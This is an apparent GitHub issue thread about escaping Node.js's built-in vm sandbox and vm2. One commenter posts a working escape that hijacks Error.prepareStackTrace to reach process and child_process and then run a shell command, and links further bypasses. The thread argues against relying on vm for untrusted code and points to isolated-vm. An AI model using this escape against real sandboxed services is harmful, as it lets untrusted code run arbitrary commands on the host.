Closed mgttt closed 5 months ago
That's just the stock node vm 🤔 vm2 did a lot more to prevent escapes but it still wasn't enough
bypass:
Error.prepareStackTrace = (e, frames) => {
frames.constructor
.constructor("return process")()
.mainModule.require("child_process")
.execSync("touch flag");
};
throw new Error();
Please don't rely on a few patches or node's vm
in general for dealing with untrusted code, it gives a false sense of security and there are countless other ways to bypass (e.g. https://gist.github.com/leesh3288/e4aa7b90417b0b0ac7bcd5b09ac7d3bd)
That's why the readme says
Consider migrating your code to isolated-vm.
Your soulution does not help as @j4k0xb showed again and again. Stop asking here what problems your solution sill has. It has nothing to do with vm2
. Move this discussion over to your own repo.
[content removed for the very unfriendly management]